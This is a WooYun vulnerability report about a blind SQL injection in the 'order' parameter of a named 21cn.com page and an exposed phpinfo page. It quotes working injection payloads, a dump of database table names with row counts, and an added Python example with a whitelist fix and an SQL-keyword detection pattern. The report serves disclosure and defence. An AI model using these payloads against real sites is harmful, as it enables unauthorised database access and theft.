
SQL injection and phpinfo information disclosure on a 世纪龙 site

ID: 112923
URL: http://www.wooyun.org/bug.php?action=view&id=112923
Status: vendor confirmed
Title: SQL injection and phpinfo information disclosure on a 世纪龙 site
Type: SQL injection
Vendor: 世纪龙信息网络有限责任公司
Reporter (white hat): 路人甲
Submitted: 2015-05-11 10:01:00
Published: 2015-06-25 11:10:00
Fixed: (not set)
Confirmed: 2015-05-11 00:00:00
Confirm Spend: 0
Tags: admin backend exposed externally, MySQL injection technique
Followers: 0
Favorites: 0
Reporter self-assessed rank: 15
Vendor-assigned rank: 15

Summary
233

Details

http://ts.21cn.com:80/home/morepost (POST)
order=1&pages=0
Parameter: order
Payload:
order=1%2c(select%20case%20when%20(3*2*1%3d6%20AND%20000776%3d000776)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)%3d1

POC

Parameter: order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: order=(SELECT (CASE WHEN (1056=1056) THEN 1056 ELSE 1056*(SELECT 1056 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pages=0
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: jutousu
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| iic_user                       | 73834   |
| iic_reply                      | 43953   |
| iic_digg                       | 41251   |
| iic_log                        | 32647   |
| iic_post_sync                  | 15150   |
| iic_user_addres                | 14712   |
| iic_digg_20131224              | 13041   |
| iic_post                       | 12630   |
| iic_post_com                   | 8575    |
| iic_reply_sync                 | 6180    |
| iic_area                       | 3407    |
| iic_collective_digg            | 1831    |
| iic_access                     | 917     |
| iic_com                        | 753     |
| iic_recom                      | 641     |
| iic_collective_reply           | 591     |
| iic_case                       | 586     |
| iic_merchant                   | 350     |
| iic_node                       | 271     |
| iic_captcha                    | 226     |
| iic_ipadmin                    | 96      |
| iic_feedback                   | 93      |
| iic_movice                     | 87      |
| iic_redblackdigg               | 73      |
| iic_collective                 | 70      |
| iic_postkeyword                | 66      |
| iic_cat                        | 61      |
| iic_reply_link                 | 60      |
| iic_collectivetimeline         | 59      |
| iic_hotpost                    | 42      |
| iic_role_account               | 39      |
| iic_team                       | 37      |
| iic_collectivenews             | 33      |
| iic_wxuser                     | 32      |
| iic_account                    | 30      |
| iic_specialcolumn              | 27      |
| iic_collectiveslide            | 26      |
| iic_proc                       | 24      |
| iic_redblacklist               | 24      |
| iic_article                    | 13      |
| iic_collectiveweibo            | 11      |
| iic_admin                      | 8       |
| iic_keyword                    | 7       |
| iic_role                       | 6       |
| iic_ip                         | 4       |
| iic_experttype                 | 3       |
| iic_post_dealwith_satisfaction | 3       |
| iic_arc                        | 2       |
| iic_wbsync                     | 2       |
| iic_filter                     | 1       |
+--------------------------------+---------+


phpinfo
The phpinfo page is exposed, and dangerous mode is also enabled...

(screenshot: s20150508174033.png)

Remediation

~~
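The remediation section of the report is empty. As an added example (not code from the report, the reporter or the vendor), the block below shows the shape of the flaw the report describes (the POST parameter order spliced into SQL text), a whitelist fix for a sort parameter, and a coarse request-body check that flags the payload quoted in the details section. ORDER BY columns cannot be bound as prepared-statement parameters, which is why the fix maps the input onto a fixed set instead of escaping it. The column mapping, table columns and the benign request body are constructed assumptions; the injection string is the one quoted in the report.

```python
"""Added example, not part of the original WooYun report or the vendor's code.

The report shows the POST parameter `order` of /home/morepost being
boolean-blind injectable and leaves remediation blank. This file shows:
  1. the bug class (user text spliced into ORDER BY),
  2. a whitelist fix (sort columns cannot be bound as query parameters),
  3. a coarse triage check over POST bodies that flags the reported payload.
Column names, the order->column mapping and BENIGN_BODY are constructed
assumptions; REPORT_PAYLOAD_BODY is the payload quoted in the report.
"""
import re
from urllib.parse import parse_qs

# Assumed mapping of the numeric `order` value onto a real column name.
ALLOWED_ORDER = {"1": "post_id", "2": "create_time", "3": "reply_count"}


def vulnerable_order_query(order: str) -> str:
    """Reproduces the bug class: the raw parameter becomes part of the SQL text."""
    return "SELECT post_id, title FROM iic_post ORDER BY " + order


def hardened_order_query(order: str) -> str:
    """Maps the parameter onto a fixed column list; anything else is rejected."""
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError("invalid order value: %r" % order)
    return "SELECT post_id, title FROM iic_post ORDER BY " + column


# Keywords that never belong in a numeric sort parameter. Deliberately narrow:
# this is a log-triage aid for finding requests like the reported one, not a WAF.
SQLI_MARKERS = re.compile(r"\b(select|case\s+when|information_schema|union)\b", re.I)


def flag_sqli_params(post_body: str) -> list:
    """Returns the names of POST parameters whose decoded value carries SQL keywords."""
    hits = set()
    # parse_qs percent-decodes values, so %20/%3d/%2c are already plain text here.
    for name, values in parse_qs(post_body, keep_blank_values=True).items():
        if any(SQLI_MARKERS.search(v) for v in values):
            hits.add(name)
    return sorted(hits)


# Constructed benign request body, in the normal shape shown in the report...
BENIGN_BODY = "order=1&pages=0"
# ...and the report's own injection payload, verbatim.
REPORT_PAYLOAD_BODY = (
    "order=1%2c(select%20case%20when%20(3*2*1%3d6%20AND%20000776%3d000776)"
    "%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)%3d1"
)

if __name__ == "__main__":
    injected = parse_qs(REPORT_PAYLOAD_BODY)["order"][0]
    print("vulnerable:", vulnerable_order_query(injected))
    print("hardened:  ", hardened_order_query("1"))
    try:
        hardened_order_query(injected)
    except ValueError as exc:
        print("rejected:  ", exc)
    print("flags:", flag_sqli_params(BENIGN_BODY), flag_sqli_params(REPORT_PAYLOAD_BODY))
```

The whitelist is the actual fix; the keyword check only helps when reviewing access logs for requests in the shape the report documents, and will miss encodings or keywords outside its short list.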

Status: 2015-05-11: details sent to the vendor, awaiting vendor handling
2015-05-11: vendor confirmed; details disclosed to the vendor only
2015-05-21: details disclosed to core white hats and relevant domain experts
2015-05-31: details disclosed to regular white hats
2015-06-10: details disclosed to intern white hats
2015-06-25: details disclosed to the public
Vendor response: Thank you for your attention to the security of our business. Based on your report, the issue is being handled. Thanks.
Response details: Severity: High; Vulnerability Rank: 15; Confirmed: 2015-05-11 11:09